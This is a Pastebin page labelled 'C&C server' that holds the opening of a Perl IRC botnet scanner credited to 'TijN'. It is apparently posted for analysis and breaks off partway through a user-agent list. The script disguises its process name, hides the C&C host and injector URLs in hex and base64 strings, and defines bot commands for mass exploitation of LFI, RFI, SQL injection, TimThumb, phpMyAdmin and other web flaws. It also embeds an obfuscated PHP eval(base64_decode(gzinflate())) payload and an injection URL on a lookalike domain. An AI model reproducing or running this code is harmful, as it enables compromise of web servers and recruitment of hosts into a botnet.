SHARE
TWEET

gangbang.mytijn.org java.txt C&C server

eromang Jan 8th, 2012 2,852 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/perl
  2. #################################################
  3. #                  _,.-----.,_
  4. #               ,-~           ~-.
  5. #             ,^___ X -TijN- X ___^.
  6. #           Y  ,--._    I    _.--.  Y
  7. #           | Y     ~-. | ,-~     Y |
  8. #           | |        }:{        | |
  9. #           j l       / | \       ! l
  10. #        .-~  (__,.--" .^. "--.,__)  ~-.
  11. #       (           / / | \ \           )
  12. #        \.____,   ~  \/"\/  ~   .____,/
  13. #         ^.____                 ____.^
  14. #            | |T ~\  !   !  /~ T| |
  15. #            | |l   _ _ _ _ _   !| |
  16. #            | l \/V V V V V V\/ j |
  17. #            l  \ \|_|_|_|_|_|/ /  !
  18. #             \  \[T T T T T TI/  /
  19. #              \  `^-^-^-^-^-^'  /
  20. #               \               /
  21. #                \.           ,/
  22. #                  "^-.___,-^"
  23. #################################################
  24. #  THE REAL DUTCH BLEND GREETZ TijN aKa Ha45k!  #
  25. #    IF U DONT UNDERSTAND THIS DONT USE IT!!    #
  26. # --------------------------------------------- #
  27. #   SO STOP MAKEING LIL SCAN CHANS FOR ME!!!!   #
  28. #################################################
  29. use HTTP::Request;                              #
  30. use HTTP::Request::Common;                      #
  31. use HTTP::Request::Common qw(POST);             #
  32. use URI::Escape;                                #
  33. use LWP::Simple;                                #
  34. use LWP 5.64;                                   #
  35. use LWP::UserAgent;                             #
  36. use Socket;                                     #
  37. use IO::Socket;                                 #
  38. use IO::Socket::INET;                           #
  39. use IO::Select;                                 #
  40. use MIME::Base64;                               #
  41. use Digest::MD5 qw(md5_hex);                    #
  42. #################################################
  43.  
  44. my $datetime = localtime;
  45.  
  46. my $fakeproc  = "\x2f\x75\x73\x72\x2f\x73\x62\x69\x6e\x2f\x68\x74\x74\x70\x64";
  47.  
  48. my $nickname    = "You\[".(int(rand(99999)))."\]abused";
  49. my $ident       = "BoT";
  50. my $channel     = "#scan#";
  51. my $shchn       = "#sshow#";
  52. my $admin       = "TijN";
  53.  
  54. my @verbindnaar = ("\x4e\x7a\x59\x6c\x4d\x6a\x63\x6c\x5a\x6a\x59\x6c\x5a\x54\x49\x6c\x4d\x7a\x59\x6c\x4d\x6a\x63\x6c\x4f\x54\x59\x6c\x4d\x54\x59\x6c\x4e\x6a\x63\x6c\x4d\x54\x59\x6c\x59\x54\x59\x6c\x5a\x54\x49\x6c\x4d\x7a\x59\x6c\x4d\x6a\x63\x6c\x4f\x54\x59\x6c");
  55.  
  56. my @deurtje   = ("\x4e\x7a\x4d\x6c\x4e\x6a\x4d\x6c\x4e\x6a\x4d\x6c\x4e\x6a\x4d\x6c","\x4d\x44\x4d\x6c\x4d\x44\x4d\x6c\x4d\x44\x4d\x6c\x4e\x7a\x4d\x6c");
  57.  
  58. my $nob0dy    = "4,1CraZy8Creation9Zzz ";
  59. my $lfilogo   = "12(4@LFI12)";
  60. my $lfdlogo   = "12(4@LFD12)";
  61. my $rfilogo   = "12(4@RFI12)";
  62. my $e107logo  = "12(4@e10712)";
  63. my $xmllogo   = "12(4@XML12)";
  64. my $sqllogo   = "12(4@SQL12)";
  65. my $oscologo  = "12(4@OSCO12)";
  66. my $cpanlogo  = "12(4@Cpanel12)";
  67. my $zenlogo   = "12(4@ZEN12)";
  68. my $oplogo    = "12(4@OpenCart12)";
  69. my $admlogo   = "12(4@phpMyAdmin12)";
  70. my $ossqllogo = "12(4@OSCO-SQL12)";
  71. my $timlogo   = "12(4@TIMTHUMB12)";
  72. my $pmwilogo  = "12(4@PmWiki12)";
  73.  
  74. my $lficmd    = '!lfi';
  75. my $lfdcmd    = '!lfd';
  76. my $rficmd    = '!rfi';
  77. my $e107cmd   = '!e107';
  78. my $xmlcmd    = '!xml';
  79. my $sqlcmd    = '!sql';
  80. my $oscocmd   = '!osco';
  81. my $cpancmd   = '!cpan';
  82. my $zencmd    = '@zen';
  83. my $opcmd     = '!op';
  84. my $admcmd    = '!adm';
  85. my $timcmd    = '!tim';
  86. my $pmwicmd   = '!pmw';
  87.  
  88. my $cmdlfi    = '!cmdlfi';
  89. my $cmde107   = '!cmde107';
  90. my $cmdxml    = '!cmdxml';
  91.  
  92. my $inject0r  = "\x5a\x6a\x4d\x6c\x4e\x44\x63\x6c\x4f\x44\x63\x6c\x4e\x44\x63\x6c\x5a\x54\x49\x6c\x4e\x44\x63\x6c\x5a\x6a\x59\x6c\x4d\x6a\x59\x6c\x4d\x44\x63\x6c\x5a\x6a\x49\x6c\x4d\x7a\x63\x6c\x4e\x44\x59\x6c\x5a\x6a\x59\x6c\x5a\x44\x59\x6c\x5a\x54\x49\x6c\x5a\x6a\x49\x6c\x5a\x44\x59\x6c\x5a\x6a\x59\x6c\x4d\x7a\x59\x6c\xa\x5a\x54\x49\x6c\x59\x7a\x59\x6c\x4d\x54\x59\x6c\x4e\x44\x63\x6c\x5a\x54\x59\x6c\x4e\x54\x59\x6c\x4d\x6a\x63\x6c\x4e\x44\x59\x6c\x5a\x54\x59\x6c\x4d\x54\x59\x6c\x59\x7a\x59\x6c\x4d\x7a\x63\x6c\x4f\x54\x59\x6c\x4e\x44\x59\x6c\x4f\x54\x59\x6c\x5a\x44\x59\x6c\x5a\x54\x49\x6c\x5a\x44\x59\x6c\x5a\x6a\x59\x6c\xa\x4d\x7a\x59\x6c\x5a\x54\x49\x6c\x4d\x6a\x63\x6c\x4e\x54\x59\x6c\x4e\x7a\x59\x6c\x4e\x7a\x59\x6c\x5a\x6a\x59\x6c\x59\x7a\x59\x6c\x4d\x6a\x59\x6c\x5a\x6a\x49\x6c\x5a\x6a\x49\x6c\x59\x54\x4d\x6c\x4d\x44\x63\x6c\x4e\x44\x63\x6c\x4e\x44\x63\x6c\x4f\x44\x59\x6c";
  93. my $b0tshell  = "\x4e\x44\x63\x6c\x4f\x44\x63\x6c\x4e\x44\x63\x6c\x5a\x54\x49\x6c\x4f\x44\x59\x6c\x4d\x7a\x63\x6c\x5a\x6a\x49\x6c\x4d\x7a\x63\x6c\x4e\x44\x59\x6c\x5a\x6a\x59\x6c\x5a\x44\x59\x6c\x5a\x54\x49\x6c\x5a\x6a\x49\x6c\x5a\x44\x59\x6c\x5a\x6a\x59\x6c\x4d\x7a\x59\x6c\x5a\x54\x49\x6c\x59\x7a\x59\x6c\x4d\x54\x59\x6c\xa\x4e\x44\x63\x6c\x5a\x54\x59\x6c\x4e\x54\x59\x6c\x4d\x6a\x63\x6c\x4e\x44\x59\x6c\x5a\x54\x59\x6c\x4d\x54\x59\x6c\x59\x7a\x59\x6c\x4d\x7a\x63\x6c\x4f\x54\x59\x6c\x4e\x44\x59\x6c\x4f\x54\x59\x6c\x5a\x44\x59\x6c\x5a\x54\x49\x6c\x5a\x44\x59\x6c\x5a\x6a\x59\x6c\x4d\x7a\x59\x6c\x5a\x54\x49\x6c\x4d\x6a\x63\x6c\xa\x4e\x54\x59\x6c\x4e\x7a\x59\x6c\x4e\x7a\x59\x6c\x5a\x6a\x59\x6c\x59\x7a\x59\x6c\x4d\x6a\x59\x6c\x5a\x6a\x49\x6c\x5a\x6a\x49\x6c\x59\x54\x4d\x6c\x4d\x44\x63\x6c\x4e\x44\x63\x6c\x4e\x44\x63\x6c\x4f\x44\x59\x6c";
  94. my $b0tak       = "\x4e\x44\x63\x6c\x4f\x44\x63\x6c\x4e\x44\x63\x6c\x5a\x54\x49\x6c\x4d\x6a\x59\x6c\x4d\x7a\x63\x6c\x5a\x6a\x49\x6c\x4d\x7a\x63\x6c\x4e\x44\x59\x6c\x5a\x6a\x59\x6c\x5a\x44\x59\x6c\x5a\x54\x49\x6c\x5a\x6a\x49\x6c\x5a\x44\x59\x6c\x5a\x6a\x59\x6c\x4d\x7a\x59\x6c\x5a\x54\x49\x6c\x59\x7a\x59\x6c\x4d\x54\x59\x6c\xa\x4e\x44\x63\x6c\x5a\x54\x59\x6c\x4e\x54\x59\x6c\x4d\x6a\x63\x6c\x4e\x44\x59\x6c\x5a\x54\x59\x6c\x4d\x54\x59\x6c\x59\x7a\x59\x6c\x4d\x7a\x63\x6c\x4f\x54\x59\x6c\x4e\x44\x59\x6c\x4f\x54\x59\x6c\x5a\x44\x59\x6c\x5a\x54\x49\x6c\x5a\x44\x59\x6c\x5a\x6a\x59\x6c\x4d\x7a\x59\x6c\x5a\x54\x49\x6c\x4d\x6a\x63\x6c\xa\x4e\x54\x59\x6c\x4e\x7a\x59\x6c\x4e\x7a\x59\x6c\x5a\x6a\x59\x6c\x59\x7a\x59\x6c\x4d\x6a\x59\x6c\x5a\x6a\x49\x6c\x5a\x6a\x49\x6c\x59\x54\x4d\x6c\x4d\x44\x63\x6c\x4e\x44\x63\x6c\x4e\x44\x63\x6c\x4f\x44\x59\x6c";
  95.  
  96. my $b0tcmd              = 'preg_replace("/.*/e","\x65\x76\x61\x6c\x28\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x28\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x28\'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\'\x29\x29\x29\x29\x3b",".");';
  97.  
  98. # TIMTUMB INJECT URLS - flickr.com - picasa.com - img.youtube.com - wordpress.com - upload.wikimedia.org - photobucket.com - blogger.com
  99. my $blog = "http://blogger.com.midislandrental.com/.mods/";
  100. #my $blog = "http://img.youtube.com.midislandrental.com/.mods/";
  101.  
  102. my @uagents   = ('Microsoft Internet Explorer/4.0b1 (Windows 95)',
  103.                                  'Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)',
  104.                                  'Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)',
  105.                                  'Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)',
  106.                                  'Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)',
  107.                                  'Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)',
  108.                                  'Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)',
  109.                                  'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
  110.                                  'Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)',
  111.                                  'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)',
  112.                                  'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)',
  113.                                  'Mozilla/4.40 (compatible; MSI4E 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)',
  114.                                  'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)',
  115.                                  'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
  116.                                  'Mozilla/4.0 (compatible; MSIE 7.0b; Win32)',
  117.                                  'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)',
  118.                                  'Microsoft Pocket Internet Explorer/0.6',
  119.                                  'Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)',
  120.                                  'MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;',
  121.                                  'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)',
  122.                                  'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)',
  123.                                  'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
  124.                                  'Advanced Browser (http://www.avantbrowser.com)',
  125.                                  'Avant Browser (http://www.avantbrowser.com)',
  126.                                  'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
  127.                                  'Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)',
  128.                                  'Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)',
  129.                                  'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
  130.                                  'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511',
  131.                                  'Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929',
  132.                                  'Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0',
  133.                                  'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox',
  134.                                  'Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4',
  135.                                  'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5',
  136.                                  'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6',
  137.                                  'Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6',
  138.                                  'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7',
  139.                                  'Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7',
  140.                                  'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4',
  141.                                  'Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4',
  142.                                  'Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5',
  143.                                  'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
  144.                                  'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
  145.                                  'Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1',
  146.                                  'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1',
  147.                                  'Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1',
  148.                                  'Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2',
  149.                                  'Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0',
  150.                                  'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b',
  151.                                  'Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0',
  152.                                  'Mozilla/3.0 (OS/2; U)',
  153.                                  'Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)',
